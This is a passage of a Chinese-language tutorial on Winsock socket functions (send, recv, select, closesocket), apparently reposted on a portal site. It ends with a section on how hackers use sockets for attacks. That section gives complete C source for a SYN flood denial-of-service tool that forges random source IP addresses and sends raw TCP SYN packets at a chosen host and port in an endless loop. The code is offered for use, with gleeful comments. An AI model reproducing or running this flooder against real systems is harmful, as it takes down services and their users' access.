| 
                         send()调用用于s指定的已连接的数据报或流套接字上发送输出数据,格式如下: 
- [cpp]  
 - int PASCAL FAR send(SOCKET s, const char FAR *buf, int len, int flags);  
 
  
参数s为已连接的本地套接字描述符。buf 指向存有发送数据的缓冲区的指针,其长度由len 指定。flags  指定传输控制方式,如是否发送带外数据等。如果没有错误发生,send()返回总共发送的字节数。否则它返回SOCKET_ERROR。 
recv()调用用于s指定的已连接的数据报或流套接字上接收输入数据,格式如下: 
- [cpp]  
 - int PASCAL FAR recv(SOCKET s, char FAR *buf, int len, int flags);  
 
  
参数s 为已连接的套接字描述符。buf指向接收输入数据缓冲区的指针,其长度由len 指定。flags  指定传输控制方式,如是否接收带外数据等。如果没有错误发生,recv()返回总共接收的字节数。如果连接被关闭,返回0。否则它返回SOCKET_ERROR。 
输入/输出多路复用──select(): 
select()调用用来检测一个或多个套接字的状态。对每一个套接字来说,这个调用可以请求读、写或错误状态方面的信息。请求给定状态的套接字集合由一个fd_set结构指示。在返回时,此结构被更新,以反映那些满足特定条件的套接字的子集,同时,  select()调用返回满足条件的套接字的数目,其调用格式如下: 
- [cpp]  
 - int PASCAL FAR select(int nfds, fd_set FAR * readfds, fd_set FAR * writefds, fd_set FAR * exceptfds, const struct timeval FAR * timeout);  
 
  
参数nfds指明被检查的套接字描述符的值域,此变量一般被忽略。 
参数readfds指向要做读检测的套接字描述符集合的指针,调用者希望从中读取数据。参数writefds  指向要做写检测的套接字描述符集合的指针。exceptfds指向要检测是否出错的套接字描述符集合的指针。timeout指向select()函数等待的最大时间,如果设为NULL则为阻塞操作。select()返回包含在fd_set结构中已准备好的套接字描述符的总数目,或者是发生错误则返回SOCKET_ERROR。 
5. 关闭套接字──closesocket() 
closesocket()关闭套接字s,并释放分配给该套接字的资源;如果s涉及一个打开的TCP连接,则该连接被释放。closesocket()的调用格式如下: 
- [cpp]  
 -  BOOL PASCAL FAR closesocket(SOCKET s);  
 
  
参数s待关闭的套接字描述符。如果没有错误发生,closesocket()返回0。否则返回值SOCKET_ERROR。 
四、黑客如何利用socket编程实现网络攻击 
1. DDOS攻击实例 
- #include  
 -  #include  
 -  #include  
 -  #include  
 -  #include  
 -  #include  
 -  #include  
 -  #include  
 -  #include 
 -  void send_tcp(int sockfd,struct sockaddr_in *addr);  
 -  unsigned short check_sum(unsigned short *addr,int len);  
 -   
 -  int main(int argc,char **argv)  
 -  {  
 -  int DESTPORT;  
 -  int sockfd;  
 -  struct sockaddr_in addr;  
 -  struct hostent *host;  
 -  int on=1;  
 -   
 -  if(argc != 3)  
 -  {  
 -  fprintf(stderr,"Usage:dos host port./n");  
 -  exit(1);  
 -  }  
 -  DESTPORT = atoi(argv[2]);  
 -  printf("no is attacking host %s with port %d../n",argv[1],DESTPORT);  
 -  //printf("ok started!/n");  
 -  bzero(&addr,sizeof(struct sockaddr_in));  
 -  addr.sin_family=AF_INET;  
 -  addr.sin_port=htons(DESTPORT);  
 -   
 -  if(inet_aton(argv[1],&addr.sin_addr)==0)  
 -  {  
 -  host=gethostbyname(argv[1]);  
 -  if(host==NULL)  
 -  {  
 -  fprintf(stderr,"HostName Error:%s/n/a",hstrerror(h_errno));  
 -  exit(1);  
 -  }  
 -  addr.sin_addr=*(struct in_addr *)(host->h_addr_list[0]);  
 -  }  
 -   
 -  /**** 使用IPPROTO_TCP创建一个TCP的原始套接字 ****/  
 -   
 -  sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP);  
 -  if(sockfd<0)  
 -  {  
 -  fprintf(stderr,"Socket Error:%s/n/a",strerror(errno));  
 -  exit(1);  
 -  }  
 -  /******** 设置IP数据包格式,告诉系统内核模块IP数据包由我们自己来填写 ***/  
 -   
 -  setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on));  
 -   
 -  /**** 没有办法,只用超级护用户才可以使用原始套接字 *********/  
 -  setuid(getpid());  
 -   
 -  /********* 发送炸弹了!!!! ****/  
 -  send_tcp(sockfd,&addr);  
 -  }  
 -   
 -   
 -   
 -  /******* 发送炸弹的实现 *********/  
 -  void send_tcp(int sockfd,struct sockaddr_in *addr)  
 -  {  
 -  char buffer[100]; /**** 用来放置我们的数据包 ****/  
 -  struct ip *ip;  
 -  int i;  
 -  struct tcphdr *tcp;  
 -  int head_len;  
 -   
 -  /******* 我们的数据包实际上没有任何内容,所以长度就是两个结构的长度 ***/  
 -   
 -  head_len=sizeof(struct ip)+sizeof(struct tcphdr);  
 -   
 -  bzero(buffer,100);  
 -   
 -   
 -  /******** 填充IP数据包的头部,还记得IP的头格式吗? ******/  
 -  ip=(struct ip *)buffer;  
 -  ip->ip_v=IPVERSION; /** 版本一般的是 4 **/  
 -  ip->ip_hl=sizeof(struct ip)>>2; /** IP数据包的头部长度 **/  
 -  ip->ip_tos=0; /** 服务类型 **/  
 -  ip->ip_len=htons(head_len); /** IP数据包的长度 **/  
 -  ip->ip_id=0; /** 让系统去填写吧 **/  
 -  ip->ip_off=0; /** 和上面一样,省点时间 **/  
 -  ip->ip_ttl=MAXTTL; /** 最长的时间 255 **/  
 -  ip->ip_p=IPPROTO_TCP; /** 我们要发的是 TCP包 **/  
 -  ip->ip_sum=0; /** 校验和让系统去做 **/  
 -  ip->ip_dst=addr->sin_addr; /** 我们攻击的对象 **/  
 -   
 -  /******* 开始填写TCP数据包 *****/  
 -  tcp=(struct tcphdr *)(buffer +sizeof(struct ip));  
 -  tcp->source=htons(LOCALPORT);  
 -  tcp->dest=addr->sin_port; /** 目的端口 **/  
 -  tcp->seq=random();  
 -  tcp->ack_seq=0;  
 -  tcp->doff=5;  
 -  tcp->syn=1; /** 我要建立连接 **/  
 -  tcp->check=0;  
 -   
 -   
 -  /** 好了,一切都准备好了.服务器,你准备好了没有?? ^_^ **/  
 -  while(1)  
 -  {  
 -  /** 你不知道我是从那里来的,慢慢的去等吧! **/  
 -  ip->ip_src.s_addr=random();  
 -   
 -  /** 什么都让系统做了,也没有多大的意思,还是让我们自己来校验头部吧 */  
 -  /** 下面这条可有可无 */  
 -  tcp->check=check_sum((unsigned short *)tcp,  
 -  sizeof(struct tcphdr));  
 -  sendto(sockfd,buffer,head_len,0,addr,sizeof(struct sockaddr_in));  
 -  }  
 -  }  
 -   
 -  /* 下面是首部校验和的算法,偷了别人的 */  
 -  unsigned short check_sum(unsigned short *addr,int len)  
 -  {  
 -  register int nleft=len;  
 -  register int sum=0;  
 -  register short *w=addr;  
 -  short answer=0;  
 -   
 -  while(nleft>1)  
 -  {  
 -  sum+=*w++;  
 -  nleft-=2;  
 -  }  
 -  if(nleft==1)  
 -  {  
 -  *(unsigned char *)(&answer)=*(unsigned char *)w;  
 -  sum+=answer;  
 -  }  
 -   
 -  sum=(sum>>16)+(sum&0xffff);  
 -  sum+=(sum>>16);  
 -  answer=~sum;  
 -  return(answer);  
 -  } 
 
                          (编辑:泰州站长网) 
【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! 
                     |